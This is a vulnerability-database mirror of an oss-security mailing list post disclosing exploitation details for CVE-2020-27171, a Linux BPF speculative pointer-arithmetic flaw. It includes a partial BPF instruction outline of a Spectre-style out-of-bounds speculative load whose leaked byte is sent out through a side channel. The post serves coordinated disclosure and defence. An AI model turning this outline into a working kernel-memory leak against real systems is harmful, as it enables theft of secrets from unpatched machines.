Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory

Related Vulnerabilities: CVE-2020-27171  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->

oss-sec
mailing list archives
<!--X-User-Header-End-->
<!--X-TopPNI-->

By Date

By Thread

</form>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory

<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->

From: Piotr Krysiuk &lt;piotras () gmail com&gt;

Date: Wed, 24 Mar 2021 19:38:11 +0000

<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->

<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
Some details of how CVE-2020-27171 could be exploited in practice were
provided via linux-distros mailing list with 7 days embargo. This was
intended to help any affected Linux distributions to assess the risk
and decide about any appropriate actions.

As the embargo expires today, I was asked to share these details
publically on oss-security.

The CVE-2020-27171 vulnerability has been successfully reproduced
against Linux kernel v5.12-rc3 using the following logic for BPF
program attached to a socket:

    load pointer to our big array into BPF_REG_MAP_PTR,
    load offset of data to leak into BPF_REG_OFFSET,

    BPF_MOV64_REG(BPF_REG_OOB_ADDRESS, BPF_REG_MAP_PTR),

    // load any slowly-loaded value...
    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),

    // ... and turn it into known zero for verifier,
    // while preserving slowly-loaded dependency for affected hardware
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),

    // speculatively bypassed offset check
    BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK,
                skip_speculation),

    // speculatively subtract masked BPF_REG_OFFSET from BPF_REG_OOB_ADDRESS,
    // where incorrect mask value 0xffffffff is used due to integer underflow
    BPF_ALU64_REG(BPF_SUB, BPF_REG_OOB_ADDRESS, BPF_REG_OFFSET),

    // speculatively out-of-bounds load
    BPF_LDX_MEM(BPF_B, BPF_REG_LEAKED_BYTE, BPF_REG_OOB_ADDRESS, 0),

    transmit speculatively loaded BPF_REG_LEAKED_BYTE via side-channel,

The full reproducers were shared with a number of Linux distributions
for protection purposes.

<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->

<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->

By Date

By Thread

Current thread:

[CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory Piotr Krysiuk (Mar 18)

Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory Piotr Krysiuk (Mar 24)

<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started